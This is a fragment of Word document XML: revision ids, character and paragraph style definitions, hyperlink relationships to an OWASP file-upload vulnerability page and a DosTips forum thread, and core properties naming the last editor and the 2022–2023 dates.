    <w:rsid w:val="008C62C2"/>
    <w:rsid w:val="00912C9C"/>
    <w:rsid w:val="00923050"/>
    <w:rsid w:val="009279C7"/>
    <w:rsid w:val="00930EBB"/>
    <w:rsid w:val="00943237"/>
    <w:rsid w:val="00953C28"/>
    <w:rsid w:val="00956DAD"/>
    <w:rsid w:val="00967ADE"/>
    <w:rsid w:val="0099020B"/>
    <w:rsid w:val="009A25E2"/>
    <w:rsid w:val="009A2FE1"/>
    <w:rsid w:val="009C1493"/>
    <w:rsid w:val="009D41A8"/>
    <w:rsid w:val="00A215F8"/>
    <w:rsid w:val="00A2771F"/>
    <w:rsid w:val="00A343C2"/>
    <w:rsid w:val="00A36706"/>
    <w:rsid w:val="00A37564"/>
    <w:rsid w:val="00A55380"/>
    <w:rsid w:val="00A56A4D"/>
    <w:rsid w:val="00A67037"/>
    <w:rsid w:val="00A82DF8"/>
    <w:rsid w:val="00A9241C"/>
    <w:rsid w:val="00AA7DF2"/>
    <w:rsid w:val="00AB4AE1"/>
    <w:rsid w:val="00AB5FED"/>
    <w:rsid w:val="00AD4553"/>
    <w:rsid w:val="00AE33FE"/>
    <w:rsid w:val="00AE475F"/>
    <w:rsid w:val="00AF5827"/>
    <w:rsid w:val="00AF590D"/>
    <w:rsid w:val="00B02A48"/>
    <w:rsid w:val="00B0390B"/>
    <w:rsid w:val="00B07A95"/>
    <w:rsid w:val="00B33EEE"/>
    <w:rsid w:val="00B34B7E"/>
    <w:rsid w:val="00B455C3"/>
    <w:rsid w:val="00B455E7"/>
    <w:rsid w:val="00B521B8"/>
    <w:rsid w:val="00B63953"/>
    <w:rsid w:val="00B75AEE"/>
    <w:rsid w:val="00B85BEC"/>
    <w:rsid w:val="00B872C3"/>
    <w:rsid w:val="00BA22BF"/>
    <w:rsid w:val="00BA4431"/>
    <w:rsid w:val="00BA7318"/>
    <w:rsid w:val="00BB2C2B"/>
    <w:rsid w:val="00BB7DE2"/>
    <w:rsid w:val="00BC74CA"/>
    <w:rsid w:val="00BD4923"/>
    <w:rsid w:val="00BD6154"/>
    <w:rsid w:val="00BE39CD"/>
    <w:rsid w:val="00BF2024"/>
    <w:rsid w:val="00C01F8B"/>
    <w:rsid w:val="00C07175"/>
    <w:rsid w:val="00C12B46"/>
    <w:rsid w:val="00C134D2"/>
    <w:rsid w:val="00C25B6B"/>
    <w:rsid w:val="00C31DE6"/>
    <w:rsid w:val="00C31EB9"/>
    <w:rsid w:val="00C341CA"/>
    <w:rsid w:val="00C50D04"/>
    <w:rsid w:val="00C55D51"/>
    <w:rsid w:val="00C70ED3"/>
    <w:rsid w:val="00C77817"/>
    <w:rsid w:val="00C93C39"/>
    <w:rsid w:val="00CB2D31"/>
    <w:rsid w:val="00CD66ED"/>
    <w:rsid w:val="00CF3A23"/>
    <w:rsid w:val="00CF611F"/>
    <w:rsid w:val="00CF78EE"/>
    <w:rsid w:val="00D076E5"/>
    <w:rsid w:val="00D133FE"/>
    <w:rsid w:val="00D206E9"/>
    <w:rsid w:val="00D2185C"/>
    <w:rsid w:val="00D44BC3"/>
    <w:rsid w:val="00D54CE5"/>
    <w:rsid w:val="00D6494F"/>
    <w:rsid w:val="00D67F7E"/>
    <w:rsid w:val="00D80446"/>
    <w:rsid w:val="00D86EF9"/>
    <w:rsid w:val="00D907F9"/>
    <w:rsid w:val="00DA6AEF"/>
    <w:rsid w:val="00DB3C26"/>
    <w:rsid w:val="00DC004E"/>
    <w:rsid w:val="00DC5C8A"/>
    <w:rsid w:val="00DD3626"/>
    <w:rsid w:val="00DD48B7"/>
    <w:rsid w:val="00DD6239"/>
    <w:rsid w:val="00DD7289"/>
    <w:rsid w:val="00E0447B"/>
    <w:rsid w:val="00E2290A"/>
    <w:rsid w:val="00E3517A"/>
    <w:rsid w:val="00E45776"/>
    <w:rsid w:val="00E459DB"/>
    <w:rsid w:val="00E57D73"/>
    <w:rsid w:val="00E7778B"/>
    <w:rsid w:val="00E77E66"/>
    <w:rsid w:val="00E95936"/>
    <w:rsid w:val="00EC6965"/>
    <w:rsid w:val="00ED562C"/>
    <w:rsid w:val="00EE459B"/>
    <w:rsid w:val="00EF65D0"/>
    <w:rsid w:val="00F14AD8"/>
    <w:rsid w:val="00F256EB"/>
    <w:rsid w:val="00F4497B"/>
    <w:rsid w:val="00F51441"/>
    <w:rsid w:val="00F72DC1"/>
    <w:rsid w:val="00F755D3"/>
    <w:rsid w:val="00F92E65"/>
    <w:rsid w:val="00FA047F"/>
    <w:rsid w:val="00FB4DAE"/>
    <w:rsid w:val="00FC616F"/>
    <w:rsid w:val="00FD1E8F"/>
    <w:rsid w:val="00FD336E"/>
    <w:rsid w:val="00FD53B2"/>
    <w:rsid w:val="00FD69B3"/>
    <w:rsid w:val="00FD73CF"/>
    <w:rsid w:val="3EE847B1"/>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603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03428"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C31DE6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0036239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623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34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wasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="External"/><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dostips.com/forum/viewtopic.php?t=8485" TargetMode="External"/><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18</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Kishor Hedau</cp:lastModifiedBy>
  <cp:revision>194</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-11T22:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-13T23:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>